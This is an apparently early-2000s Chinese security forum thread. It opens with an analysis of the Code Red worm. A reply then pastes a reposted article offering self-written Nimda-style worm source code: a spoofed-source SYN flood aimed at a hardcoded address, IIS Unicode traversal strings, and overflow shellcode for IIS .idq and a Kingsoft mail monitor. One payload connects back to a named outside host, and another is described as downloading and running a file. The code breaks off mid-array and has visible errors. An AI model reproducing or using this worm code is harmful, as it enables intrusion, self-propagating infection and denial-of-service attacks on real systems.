moqingsong

论坛版主

注册日期2002-04-07
最后登录2011-02-03
粉丝0
关注0
积分74分
威望71点
贡献值0点
好评度10点
原创分0分
专家分0分

加关注写私信

阅读：1992回复：6

红色代码病毒分析

楼主^#

更多发布于：2002-08-05 13:46

红色代码病毒分析

作者: 不详

CODE RED 利用 IIS WEB 服务器 .IDA 缓冲区溢出漏洞传播。如果它感染了一个主机，将会在受影响机器上作如下活动：

1、建立起初始蠕虫环境
2、建立起100个蠕虫线程
3、前99个线程会传播感染其它主机
4、第100个线程会检查自身是否运行于一个英文版本的 Windows NT/2000

如果是，它将会替换该主机页面

Welcome to http://www.worm.com !, Hacked By Chinese!

该信息会在10小时后自动消失,除非再次受到感染。

如果不是英文版本，它也会被用作感染其它主机。

5、每个线程会检查当地时间
如果时间位于 20:00 UTC 和 23:59 UTC 间，该线程会往 www.whitehouse.gov 发送 100K 字节数据。
如果小于 20:00 UTC，它会继续传播感染其它主机

在下面的详细分析中，将要用到

IDA(Interactive Disassembler) ，它来自www.datarescue.com。
MS VC++ 调试环境

我将该蠕虫分为三个部分以便研究：核心功能模块，hack web 页面模块，攻击 www.whitehouse.gov 模块。

一、核心功能模块

1、起始感染容器（已被感染并将传播蠕虫的主机）

当被感染时，系统内存将会呈现如下信息：

4E 00 4E 00 4E 00 4E 00
4E 00 4E 00 4E 00 4E 00
4E 00 4E 00 4E 00 4E 00
92 90 58 68 4E 00 4E 00
4E 00 4E 00 4E 00 4E 00
FA 00 00 00 90 90 58 68
D3 CB 01 78 90 90 58 68
D3 CB 01 78 90 90 58 68
D3 CB 01 78 90 90 90 90
90 81 C3 00 03 00 00 8B
1B 53 FF 53 78

EIP 会被 0x7801CBD3 重写。在 0x7801CBD3 处的代码将会被分解成 call ebx ，当 EIP 被 call ebx 重写保

喜欢0

按第一贴的“给分”键，给分。

andrews13

驱动牛犊

注册日期2002-06-28
最后登录2013-05-01
粉丝0
关注0
积分2分
威望27点
贡献值0点
好评度7点
原创分0分
专家分0分

加关注写私信

沙发^#

发布于：2002-08-13 09:56

[quote]红色代码病毒分析

作者: 不详

CODE RED 利用 IIS WEB 服务器 .IDA 缓冲区溢出漏洞传播。如果它感染了一个主机，将会在受影响机器上作如下活动：

1、建立起初始蠕虫环境
2、建立起100个蠕虫线程
3、前99个线程会传播感染其它主机
4、第100个线程会检查自身是否运行于一个英文版本的 Windows NT/2000

如果是，它将会替换该主机页面

Welcome to http://www.worm.com !, Hacked By Chinese!

该信息会在10小时后自动消失,除非再次受到感染。

如果不是英文版本，它也会被用作感染其它主机。

5、每个线程会检查当地时间
如果时间位于 20:00 UTC 和 23:59 UTC 间，该线程会往 www.whitehouse.gov 发送 100K 字节数据。
如果小于 20:00 UTC，它会继续传播感染其它主机

在下面的详细分析中，将要用到

IDA(Interactive Disassembler) ，它来自www.datarescue.com。
MS VC++ 调试环境

我将该蠕虫分为三个部分以便研究：核心功能模块，hack web 页面模块，攻击 www.whitehouse.gov 模块。

一、核心功能模块

1、起始感染容器（已被感染并将传播蠕虫的主机）

当被感染时，系统内存将会呈现如下信息：

4E 00 4E 00 4E 00 4E 00
4E 00 4E 00 4E 00 4E 00
4E 00 4E 00 4E 00 4E 00
92 90 58 68 4E 00 4E 00
4E 00 4E 00 4E 00 4E 00
FA 00 00 00 90 90 58 68
D3 CB 01 78 90 90 58 68
D3 CB 01 78 90 90 58 68
D3 CB 01 78 90 90 90 90
90 81 C3 00 03 00 00 8B
1B 53 FF 53 78

EIP 会被 0x7801CBD3 重写。在 0x7801CBD3 处的代码将会被分解成 call ebx ，当 EIP 被 call ebx 重写保

回复喜欢

moqingsong

论坛版主

注册日期2002-04-07
最后登录2011-02-03
粉丝0
关注0
积分74分
威望71点
贡献值0点
好评度10点
原创分0分
专家分0分

加关注写私信

板凳^#

发布于：2002-08-13 10:12

给个连接。

按第一贴的“给分”键，给分。

回复喜欢

zsb9527

驱动小牛

注册日期2002-05-31
最后登录2018-05-29
粉丝0
关注0
积分2分
威望10点
贡献值0点
好评度0点
原创分0分
专家分0分

加关注写私信

地板^#

发布于：2002-08-13 12:46

http://www.kv365.com/news/972.html
   Nimda源代码级揭密
--------------------------------------------------------------------------------

02-19-2002 16:54:29　病毒资讯网　拉登　点击:854



1.0.0一些声明
本文并不是使用nimda的源代码来讲座的，本文的作者是根据对nimda的行为分析加上作者本人的功底自悟写出来的
本文提供的程序代码均在VC5.0/6.0+win9x/me/2000+sp1/xp/nt4.0+sp4下测试通过

1.1.1
Unicode漏洞
  最近网上关于它的东西有不少，所以我就不费口舌了。
  直接从网上便可得到许多的资料
1.1.2
WinME/XP UPNP 漏洞
  很多黑客网站上都有它的资料，我就不在这里说了。有漏洞机器大约有30000来台，本次新增
1.1.3
金山毒霸2001的邮件监控（mailmon.exe）存在缓冲溢出漏洞
  tombkeeper说的非常清楚,我就不多说了。这样的机器就更多了。本次新增
1.1.4
IIS5.0 .idq 漏洞
   前些日子的Redcode就用的这个。本次新增
1.1.5
IIS4.0的缓冲漏洞
   古老的漏洞了，不过仍有有这个漏洞的机器。本次新增
1.2 TFTP
  这个东西用TFTPd.exe就行了,不过我这里使用TFTP.DLL作服务器。原因是我不想让人发现它的进程。这一次还利用了FTP服务器www.wormworld.com作中转。本次改进
1.4 Riched20.dll
  其实就是把%system%//Riched20.dll的结构导出来，修改Dllmain的代码，把病毒体从它的体内分离出来。
  这东西写起来即麻烦又废时间，索性使用另外的方法代替了
  riched20()函数的内容
HANDLE hFile=CreateFile(\"riched20.DLL\",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
   if(hFile==INVALID_HANDLE_VALUE)
   {
   //printf(\"\\nCreate file %s failed:%d\",RemoteFilePath,GetLastError());
   return -1
   }
   //写文件内容
   DWORD i=0,dwIndex=0,dwWrite,dwSize=sizeof(tftpdllbuff)
   while(dwSize>dwIndex)
   {
   if(!WriteFile(hFile,&richedpdllbuff[dwIndex],dwSize-dwIndex,&dwWrite,NULL))
   {
   //printf(\"\\nWrite file %s failed:%d\",\"riched20.DLL\",GetLastError());
   return -1
   }
   dwIndex+=dwWrite;
   }

   //关闭文件句柄
   CloseHandle(hFile);
1.5 Base64
  看到代码就懂了
1.6 pe病毒部分
  这是新功能。本次新增
1.7 SYNflood
   分布式洪水报文攻击。本次新增。
1.8 主程序代码

------------------------------------<nimda.cpp>--------------------------------------------------
file://Don\'t forget to link with wsock32.lib :-o
#include <windows.h>
#include <shellapi.h>
#include <dos.h>
#include <stdio.h>
#include <mapi.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <limits.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <winbase.h>
#include <winsock.h>
#include <stdafx.h>
#include <winsock2.h>
#include <Ws2tcpip.h>
#define SEQ 0x28376839
#define SYN_DEST_IP \"134.60.98.7\" //目的IP(美国国防部)
#define FAKE_IP \"134.60.98.7\" //伪装IP超始值，本程序的伪装IP覆盖一个B类网段(美国国防部攻击美国国防部？？！！）
#define STATUS_FAILED 0xFFFF //错误返回值

typedef struct _iphdr{ //定义IP首部
  unsigned char h_verlen; //4位首部长度，4位IP版本号
  unsigned char tos; //
  unsigned short total_len;
  unsigned short ident;
  unsigned short frag_and_flags;
  unsigned short ttl;
  unsigned char proto;
  unsigned short checksum;
  unsigned int sourceIP;
  unsigned int destIP;
}IP_HEADER;

struct{ //定义TCP伪首部
  unsigned long saddr;
  unsigned long daddr;
   char mbz;
   char ptcl;
  unsigned short tcpl;
}psd_header;

typedef struct _tcphdr{ //定义TCP首部
  USHORT th_sport;
  USHORT th_dpost;
  unsigned int ht_seq;
  unsigned int ht_ack;
  unsigned char th_lenres;
  unsigned char th_flag;
  USHORT th_win;
  USHORT th_sum;
  USHORT th_urp;
}TCP_HEADER;

USHORT checksum(USHORT *buffer,int size){ //计算验和的子函数
  unsigned long chsum=0;
  while(size>1){
   chsum+=*buffer++;
   size-=sizeof(USHORT);
  }
  if(size){
   chsum+=*(UCHAR*)buffer;
  }
  chsum=(chsum>>16)+(chsum & 0xffff);
  chsum+=(chsum>>16);
  return (USHORT)(~chsum);
}
int WINAPI flood()
{
  int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost;
  int TimeOut=2000,SendSEQ=0;
  char SendBuf[128]={0};
  char RecvBuf[65535]={0};
  WSADATA wsaData;
  SOCKET SockRaw=(SOCKET)NULL;
  struct sockaddr_in DestAddr;
  IP_HEADER ip_header;
  TCP_HEADER tcp_header;
  //初始化SOCK_RAW
  if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){
   //fprintf(stderr,\"WSAStartup failed:%d\\n\",ErrorCode);
   return 0
  }
  //建立套接字
  SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
  if(SockRaw==INVALID_SOCKET){
   //fprintf(stderr,\"WSASocket() failed:%d\\n\",WSAGetLastError());
   return 0
  }
  flag=TRUE;
  //设置IP_HDRINCL以自己填充IP首部
  ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));
  if(ErrorCode==SOCKET_ERROR)//printf(\"Set IP_HDRINCL Error!\\n\");
  __try{
   ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char *)&TimeOut,sizeof(TimeOut));
   if(ErrorCode==SOCKET_ERROR){
   //fprintf(stderr,\"Failed to set send TimeOut:%d\\n\",WSAGetLastError());
   return 0
   }
   memset(&DestAddr,0,sizeof(DestAddr));
   DestAddr.sin_family=AF_INET;
   DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP);
   FakeIpNet=inet_addr(FAKE_IP);
   FakeIpHost=ntohl(FakeIpNet);
   //填充IP首部
   ip_header.h_verlen =(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //高四位IP版本号
   ip_header.total_len =htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16位总长度
   ip_header.ident =1;
   ip_header.frag_and_flags =0;
   ip_header.ttl =128;
   ip_header.proto =IPPROTO_TCP;
   ip_header.checksum =0;
   ip_header.sourceIP =htonl(FakeIpHost+SendSEQ);
   ip_header.destIP =inet_addr(SYN_DEST_IP);
   //填充TCP首部
   tcp_header.th_sport =htons(7000);
   tcp_header.th_dpost =htons(8080);
   tcp_header.ht_seq=htonl(SEQ+SendSEQ);
   tcp_header.ht_ack=0;
   tcp_header.th_lenres =(sizeof(TCP_HEADER)/4<<4|0);
   tcp_header.th_flag =2;
   tcp_header.th_win =htons(16384);
   tcp_header.th_urp =0;
   tcp_header.th_sum =0;
   //填充TCP伪首部
   psd_header.saddr=ip_header.sourceIP ;
   psd_header.daddr=ip_header.destIP ;
   psd_header.mbz=0;
   psd_header.ptcl=IPPROTO_TCP;
   psd_header.tcpl=htons(sizeof(tcp_header));
   while(1){
   //每发送1024个报文输出一个标示符
   //printf(\".\");
   for(counter=0;counter<1024;counter++){
   if(SendSEQ++==65536)SendSEQ=1; //序列循环
   //改IP首部
   ip_header.checksum =0;
   ip_header.sourceIP =htonl(FakeIpHost+SendSEQ); //32位源IP
   //改TCP首部
   tcp_header.ht_seq =htonl(SEQ+SendSEQ); //SYN序列号
   tcp_header.th_sum =0;
   //改TCP Pseudo Header
   psd_header.saddr=ip_header.sourceIP ;
   //计算TCP校验和，计算校验和时需要包括TCP pssudo header
   memcpy(SendBuf,&psd_header,sizeof(psd_header));
   memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));
   tcp_header.th_sum=checksum((USHORT*)SendBuf,sizeof(psd_header)+sizeof(tcp_header));
   //计算IP校验和
   memcpy(SendBuf,&ip_header,sizeof(ip_header));
   memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));
   memcpy(SendBuf+sizeof(ip_header),sizeof(tcp_header),0,4);
   datasize=sizeof(ip_header)+sizeof(tcp_header);
   //填充发送缓冲区
   memcpy(SendBuf,&ip_header,sizeof(ip_header));
   //发送
   ErrorCode=sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*)&DestAddr,sizeof(DestAddr));
   if(ErrorCode==SOCKET_ERROR)//printf(\"\\Send Error:%d\\n\",GetLastError());
   }//end for
   }//end while
  }//end try
  __finally{
   if(SockRaw!=INVALID_SOCKET)closesocket(SockRaw);
   WSACleanup();
  }
  return 0;
}//end flood

  HMODULE hKERNEL32 ;
  FARPROC a_RegisterServiceProcess ;

  HMODULE hMPR ;
  FARPROC a_WNetOpenEnum ;
  FARPROC a_WNetCloseEnum ;
  FARPROC a_WNetEnumResource ;

  HMODULE hADVAPI ;
  FARPROC a_RegOpenKeyExA ;
  FARPROC a_RegQueryValueExA ;
  FARPROC a_RegCloseKey ;

  HINSTANCE hWINSOCK ;
  FARPROC a_WSAStartup ;
  FARPROC a_inet_addr ;
  FARPROC a_gethostbyaddr ;
  FARPROC a_gethostbyname ;
  FARPROC a_htons ;
  FARPROC a_socket ;
  FARPROC a_connect ;
  FARPROC a_send ;
  FARPROC a_recv ;
  FARPROC a_closesocket ;
  FARPROC a_WSACleanup ;

  SOCKET conn_socket ;

  char szSMTPname[ 256] ;
  char szSMTPaddr[ 256] ;
  char szMAIL_FROM[ 256] ;
  char szRCPT_TO[ 256] ;
  int Found ;
  BOOL InetActivated ;
  BOOL MailDone ;
  long WINAPI L0calThread ( long) ;
  long WINAPI Rem0teThread ( long) ;
  long WINAPI MailThread ( long) ;
  void NetW0rming ( LPNETRESOURCE) ;
  void Rem0teInfecti0n ( char *) ;
  BOOL str2socket ( char *, BOOL) ;
  BOOL GetSMTP ( char *, char *) ;
  void base64_encode ( const void *, int) ;
  char *DecryptStr ( char *) ;
  void FindPe0ple ( char *) ;
  void WaitC0nnected ( void) ;
  BOOL CALLBACK EnumWindowsProc ( HWND, LPARAM) ;
//金山毒霸漏洞代码
unsigned char eip[8] = JUMPESP;
unsigned char sploitx[] = {
0x90, 0x8b, 0xfc,
0x33, 0xc0, 0x50, 0xf7, 0xd0, 0x50, 0x59, 0xf2, 0xaf, 0x59, 0xb1, 0xc6,
0x8b, 0xc7, 0x48, 0x80, 0x30, 0x99, 0xe2, 0xfa, 0x33, 0xf6, 0x96, 0xbb,
0x99, 0xac, 0xb0, 0x42, 0xc1, 0xeb, 0x08, 0x56, 0xff, 0x13, 0x8b, 0xd0,
0xfc, 0x33, 0xc9, 0xb1, 0x0b, 0x49, 0x32, 0xc0, 0xac, 0x84, 0xc0, 0x75,
0xf9, 0x52, 0x51, 0x56, 0x52, 0xb3, 0xe0, 0xff, 0x13, 0xab, 0x59, 0x5a,
0xe2, 0xec, 0x32, 0xc0, 0xac, 0x84, 0xc0, 0x75, 0xf9, 0xb3, 0xac, 0x56,
0xff, 0x13, 0x8b, 0xd0, 0xfc, 0x33, 0xc9, 0xb1, 0x06, 0x32, 0xc0, 0xac,
0x84, 0xc0, 0x75, 0xf9, 0x52, 0x51, 0x56, 0x52, 0xb3, 0xe0, 0xff, 0x13,
0xab, 0x59, 0x5a, 0xe2, 0xec, 0x83, 0xc6, 0x05, 0x33, 0xc0, 0x50, 0x40,
0x50, 0x40, 0x50, 0xff, 0x57, 0xe8, 0x93, 0x6a, 0x10, 0x56, 0x53, 0xff,
0x57, 0xec, 0x6a, 0x02, 0x53, 0xff, 0x57, 0xf0, 0x33, 0xc0, 0x57, 0x50,
0xb0, 0x0c, 0xab, 0x58, 0xab, 0x40, 0xab, 0x5f, 0x48, 0x50, 0x57, 0x56,
0xad, 0x56, 0xff, 0x57, 0xc0, 0x48, 0x50, 0x57, 0xad, 0x56, 0xad, 0x56,
0xff, 0x57, 0xc0, 0x48, 0xb0, 0x44, 0x89, 0x07, 0x57, 0xff, 0x57, 0xc4,
0x33, 0xc0, 0x8b, 0x46, 0xf4, 0x89, 0x47, 0x3c, 0x89, 0x47, 0x40, 0x8b,
0x06, 0x89, 0x47, 0x38, 0x33, 0xc0, 0x66, 0xb8, 0x01, 0x01, 0x89, 0x47,
0x2c, 0x57, 0x57, 0x33, 0xc0, 0x50, 0x50, 0x50, 0x40, 0x50, 0x48, 0x50,
0x50, 0xad, 0x56, 0x33, 0xc0, 0x50, 0xff, 0x57, 0xc8, 0xff, 0x76, 0xf0,
0xff, 0x57, 0xcc, 0xff, 0x76, 0xfc, 0xff, 0x57, 0xcc, 0x48, 0x50, 0x50,
0x53, 0xff, 0x57, 0xf4, 0x8b, 0xd8, 0x33, 0xc0, 0xb4, 0x04, 0x50, 0xc1,
0xe8, 0x04, 0x50, 0xff, 0x57, 0xd4, 0x8b, 0xf0, 0x33, 0xc0, 0x8b, 0xc8,
0xb5, 0x04, 0x50, 0x50, 0x57, 0x51, 0x56, 0xff, 0x77, 0xa8, 0xff, 0x57,
0xd0, 0x83, 0x3f, 0x01, 0x7c, 0x22, 0x33, 0xc0, 0x50, 0x57, 0xff, 0x37,
0x56, 0xff, 0x77, 0xa8, 0xff, 0x57, 0xdc, 0x0b, 0xc0, 0x74, 0x2f, 0x33,
0xc0, 0x50, 0xff, 0x37, 0x56, 0x53, 0xff, 0x57, 0xf8, 0x6a, 0x50, 0xff,
0x57, 0xe0, 0xeb, 0xc8, 0x33, 0xc0, 0x50, 0xb4, 0x04, 0x50, 0x56, 0x53,
0xff, 0x57, 0xfc, 0x57, 0x33, 0xc9, 0x51, 0x50, 0x56, 0xff, 0x77, 0xac,
0xff, 0x57, 0xd8, 0x6a, 0x50, 0xff, 0x57, 0xe0, 0xeb, 0xaa, 0x50, 0xff,
0x57, 0xe4, 0x90, 0xd2, 0xdc, 0xcb, 0xd7, 0xdc, 0xd5, 0xaa, 0xab, 0x99,
0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde,
0xfc, 0xed, 0xca, 0xed, 0xf8, 0xeb, 0xed, 0xec, 0xe9, 0xd0, 0xf7, 0xff,
0xf6, 0xd8, 0x99, 0xda, 0xeb, 0xfc, 0xf8, 0xed, 0xfc, 0xc9, 0xeb, 0xf6,
0xfa, 0xfc, 0xea, 0xea, 0xd8, 0x99, 0xda, 0xf5, 0xf6, 0xea, 0xfc, 0xd1,
0xf8, 0xf7, 0xfd, 0xf5, 0xfc, 0x99, 0xc9, 0xfc, 0xfc, 0xf2, 0xd7, 0xf8,
0xf4, 0xfc, 0xfd, 0xc9, 0xf0, 0xe9, 0xfc, 0x99, 0xde, 0xf5, 0xf6, 0xfb,
0xf8, 0xf5, 0xd8, 0xf5, 0xf5, 0xf6, 0xfa, 0x99, 0xce, 0xeb, 0xf0, 0xed,
0xfc, 0xdf, 0xf0, 0xf5, 0xfc, 0x99, 0xcb, 0xfc, 0xf8, 0xfd, 0xdf, 0xf0,
0xf5, 0xfc, 0x99, 0xca, 0xf5, 0xfc, 0xfc, 0xe9, 0x99, 0xdc, 0xe1, 0xf0,
0xed, 0xc9, 0xeb, 0xf6, 0xfa, 0xfc, 0xea, 0xea, 0x99, 0xce, 0xca, 0xd6,
0xda, 0xd2, 0xaa, 0xab, 0x99, 0xea, 0xf6, 0xfa, 0xf2, 0xfc, 0xed, 0x99,
0xfb, 0xf0, 0xf7, 0xfd, 0x99, 0xf5, 0xf0, 0xea, 0xed, 0xfc, 0xf7, 0x99,
0xf8, 0xfa, 0xfa, 0xfc, 0xe9, 0xed, 0x99, 0xea, 0xfc, 0xf7, 0xfd, 0x99,
0xeb, 0xfc, 0xfa, 0xef, 0x99, 0x9b, 0x99,
0x99, 0x0d, //port=148
0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99, 0x99,
0xfa, 0xf4, 0xfd, 0xb7, 0xfc, 0xe1, 0xfc, 0x99, 0xff, 0xff, 0xff, 0xff,
0x0d, 0x0a};

//这段溢出代码是一段通用的溢出代码,只要改其中几个地方就可以用于任何一个程序的溢出,是ipxodi写的
//0xbb,0x99, 0xac, 0xb0, 0x42对应的汇编代码 mov ebx,42b0ach,是mailmon.exe中函数LoadLibraryA的入口地址
//可以用win32Dasm打开mailmon.exe查找LoadLibraryA,会看见:0040f7c2 ff15acb04200 Call dword ptr [0042b0ac]
//的字样,如果用于别的程序溢出,也可以这样查找并更改
//0xb3, 0xe0对应的汇编代码喂mov bl,e0h
//可以用win32Dasm打开mailmon.exe查找GetProcAddress,会看见:0041e2bf ff15acb04200 Call dword ptr [0042b0e0]
//的字样,它的地址和LoadLibraryA只最后一个字节不一样,所以mov bl,e0h
//0xb3, 0xac对应的汇编代码为mov bl,ac
//道理和上面一样

//WinME/XP UPNP 漏洞的shellcode声明
#define JUMPESP \"\\x47\\x8f\\xaa\\x77\"
#define MAX 10000
#define PORTx 5000
#define FREEZE 512
#define NOP 0x43 //inc ebx, instead of 0x90
file://定义常量
int num=0;
int ExeDirNum=0;
HANDLE hSemaphore=NULL;
char *mybytes;
unsigned long sizemybytes;
MaxThread=100;//最大开100个线程扫描
file://下面定义漏洞数组
char *vers=\"KittyXP.a\"//版本号
char *writer=\"Squirrel in Dalian\"//作者？
char *hole[]={\"%c0%2f..%c0%2f..%c0%2f\",
\"%c0%af..%c0%af..%c0%af\",
\"%c1%1c..%c1%1c..%c1%1c\",
\"%c1%9c..%c1%9c..%c1%9c\",
\"%c0%2f..%c0%2f..%c0%2f\",
\"%c0%af\",
\"%c1%9c\",
\"%c1%pc\",
\"%c0%9v\",
\"%c0%qf\",
\"%c1%8s\",
\"%c1%1c\",
\"%c1%9c\",
\"%c1%af\",
\"%e0%80%af\",
\"%f0%80%80%af\",
\"%f8%80%80%80%af\",
\"%fc%80%80%80%80%af\",
\"%e0%80%af../..%e0%80%af../..%e0%80%af\",
\"%e0%80%af..%e0%80%af..%e0%80%af\",
\"%c1%1c../..%c1%1c../..%c1%1c\",
\"%e0%80%af../..%e0%80%af../..%e0%80%af\",
\"%e0%80%af..%e0%80%af..%e0%80%af\",\"%c1%1c../..%c1%1c../..%c1%1c\",
\"%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af../..%e0%80%af\",
\"%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af\",
\"%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c../..%c1%1c\"};

file://下面7个漏洞出现的目录，可以自己定义更多，但务必修改后改下面的for循环数字
char *ExeDirs[7]={\"scripts\",\"msadc\",\"cgi-bin\",\"_vti_bin\",\"_vti_bin/msadc\",\"scripts/msadc\",\"IISADMPWD\"};
unsigned char tftpdllbuff[]=\"\";//这里存放的是Tftp.dll的二进制码
//unsigned char riched20dllbuff[]=\"\";//这里存放的是riched20.dll的二进制码
file://声明函数
long GetLocalIP(void);//获得本机IP
DWORD WINAPI FindExeDir(LPVOID lp);//找到可执行目录
char *GetData(int SockFD);//获取SEND返回的数据
char * find(const char*pszSource,const char * pszKey);//在返回数据中查找指定字符串
DWORD WINAPI TFTP32();
//DWORD WINAPI Riched20()
int WINAPI redcode(char *argv[])
int WINAPI iis4(char *argv[])
int WINAPI xpmethd(char *argv[])
int WINAPI anitthd(char *argv[])
void WINAPI pevirus(char *argv[])
void WINAPI worm()
char *localpath;//system32的路径
char *exedir;//脚本路径
char* WebPath;//首页所存放的路径
//下面是关于IIS5.0 .idq 漏洞的声明
#define RET 0x77e516de /* jmp or call ebx */
#define GMHANDLEA 0x77e56c42 /* Address of GetModuleHandleA */
#define GPADDRESS 0x77e59ac1 /* Address of GetProcAddress */
#define GMHANDLEA_OFFSET 24
#define GPADDRESS_OFFSET 61
#define OFFSET 234 /* exception handler offset */
#define NOP 0x41

#define MASKING 1
#if MASKING
#define PORTMASK 0x4141
#define ADDRMASK 0x41414141
#define PORTMASK_OFFSET 128
#define ADDRMASK_OFFSET 133
#endif

#define PORT 80
#define ADDR \"www.squirrel2002.com.cn\"//作者的主页？
#define PORT_OFFSET 115
#define ADDR_OFFSET 120
unsigned char shellcode[]=
\"\\x5B\\x33\\xC0\\x40\\x40\\xC1\\xE0\\x09\\x2B\\xE0\\x33\\xC9\\x41\\x41\\x33\\xC0\"
\"\\x51\\x53\\x83\\xC3\\x06\\x88\\x03\\xB8\\xDD\\xCC\\xBB\\xAA\\xFF\\xD0\\x59\\x50\"
\"\\x43\\xE2\\xEB\\x33\\xED\\x8B\\xF3\\x5F\\x33\\xC0\\x80\\x3B\\x2E\\x75\\x1E\\x88\"
\"\\x03\\x83\\xFD\\x04\\x75\\x04\\x8B\\x7C\\x24\\x10\\x56\\x57\\xB8\\xDD\\xCC\\xBB\"
\"\\xAA\\xFF\\xD0\\x50\\x8D\\x73\\x01\\x45\\x83\\xFD\\x08\\x74\\x03\\x43\\xEB\\xD8\"
\"\\x8D\\x74\\x24\\x20\\x33\\xC0\\x50\\x40\\x50\\x40\\x50\\x8B\\x46\\xFC\\xFF\\xD0\"
\"\\x8B\\xF8\\x33\\xC0\\x40\\x40\\x66\\x89\\x06\\xC1\\xE0\\x03\\x50\\x56\\x57\\x66\"
\"\\xC7\\x46\\x02\\xBB\\xAA\\xC7\\x46\\x04\\x44\\x33\\x22\\x11\"
#if MASKING
\"\\x66\\x81\\x76\\x02\\x41\\x41\\x81\\x76\\x04\\x41\\x41\\x41\\x41\"
#endif
\"\\x8B\\x46\\xF8\\xFF\\xD0\\x33\\xC0\"
\"\\xC7\\x06\\x5C\\x61\\x61\\x2E\\xC7\\x46\\x04\\x65\\x78\\x65\\x41\\x88\\x46\\x07\"
\"\\x66\\xB8\\x80\\x01\\x50\\x66\\xB8\\x01\\x81\\x50\\x56\\x8B\\x46\\xEC\\xFF\\xD0\"
\"\\x8B\\xD8\\x33\\xC0\\x50\\x40\\xC1\\xE0\\x09\\x50\\x8D\\x4E\\x08\\x51\\x57\\x8B\"
\"\\x46\\xF4\\xFF\\xD0\\x85\\xC0\\x7E\\x0E\\x50\\x8D\\x4E\\x08\\x51\\x53\\x8B\\x46\"
\"\\xE8\\xFF\\xD0\\x90\\xEB\\xDC\\x53\\x8B\\x46\\xE4\\xFF\\xD0\\x57\\x8B\\x46\\xF0\"
\"\\xFF\\xD0\\x33\\xC0\\x50\\x56\\x56\\x8B\\x46\\xE0\\xFF\\xD0\\x33\\xC0\\xFF\\xD0\";

unsigned char storage[]=
\"\\xEB\\x02\"
\"\\xEB\\x4E\"
\"\\xE8\\xF9\\xFF\\xFF\\xFF\"
\"msvcrt.ws2_32.socket.connect.recv.closesocket.\"
\"_open._write._close._execl.\";

unsigned char forwardjump[]=
\"%u08eb\";

unsigned char jump_to_shell[]=
\"%uC033%uB866%u031F%u0340%u8BD8%u8B03\"
\"%u6840%uDB33%u30B3%uC303%uE0FF\";

unsigned int resolve(char *name)
{
  struct hostent *he;
  unsigned int ip;

  if((ip=inet_addr(name))==(-1))
  {
   if((he=gethostbyname(name))==0)
   return 0;
   memcpy(&ip,he->h_addr,4);
  }
  return ip;
}

int make_connection(char *address,int port)
{
  struct sockaddr_in server,target;
  int s,i,bf;
  fd_set wd;
  struct timeval tv;

  s = socket(AF_INET,SOCK_STREAM,0);
  if(s<0)
   return -1;
  memset((char *)&server,0,sizeof(server));
  server.sin_family = AF_INET;
  server.sin_addr.s_addr = htonl(INADDR_ANY);
  server.sin_port = 0;

  target.sin_family = AF_INET;
  target.sin_addr.s_addr = resolve(address);
  if(target.sin_addr.s_addr==0)
  {
   close(s);
   return -2;
  }
  target.sin_port = htons(port);
  bf = 1;
  ioctl(s,FIONBIO,&bf);
  tv.tv_sec = 10;
  tv.tv_usec = 0;
  FD_ZERO(&wd);
  FD_SET(s,&wd);
  connect(s,(struct sockaddr *)&target,sizeof(target));
  if((i=select(s+1,0,&wd,0,&tv))==(-1))
  {
   close(s);
   return -3;
  }
  if(i==0)
  {
   close(s);
   return -4;
  }
  i = sizeof(int);
  getsockopt(s,SOL_SOCKET,SO_ERROR,&bf,&i);
  if((bf!=0)||(i!=sizeof(int)))
  {
   close(s);
   errno = bf;
   return -5;
  }
  ioctl(s,FIONBIO,&bf);
  return s;
}

int get_connection(int port)
{
  struct sockaddr_in local,remote;
  int lsock,csock,len,reuse_addr;

  lsock = socket(AF_INET,SOCK_STREAM,0);
  if(lsock<0)
  {
   // perror(\"socket\");
   return -1
   }
  reuse_addr = 1;
  if(setsockopt(lsock,SOL_SOCKET,SO_REUSEADDR,(char *)&reuse_addr,sizeof(reuse_addr))<0)
  {
   //perror(\"setsockopt\");
   close(lsock);
   return -1

  }
  memset((char *)&local,0,sizeof(local));
  local.sin_family = AF_INET;
  local.sin_port = htons(port);
  local.sin_addr.s_addr = htonl(INADDR_ANY);
  if(bind(lsock,(struct sockaddr *)&local,sizeof(local))<0)
  {
   //perror(\"bind\");
   close(lsock);
   return -1

  }
  if(listen(lsock,1)<0)
  {
   // perror(\"listen\");
   close(lsock);
   return -1

  }
retry:
  len = sizeof(remote);
  csock = accept(lsock,(struct sockaddr *)&remote,&len);
  if(csock<0)
  {
   if(errno!=EINTR)
   {
   //perror(\"accept\");
   close(lsock);
   return -1

   }
   else
   goto retry;
  }
  close(lsock);
  return csock;
}
unsigned long __stdcall doweb(void *inr) {
char buf[1024];
SOCKET in = *((SOCKET *)inr);
recv(in,buf,1024,0);
send(in,mybytes,sizemybytes,0);
closesocket(in);
return 0;
}
//下面是redcode的shellcode
// this is the sploit code written by Dark Spyrit, it downloads a file and runs it
char sploit[] = { 0x47,
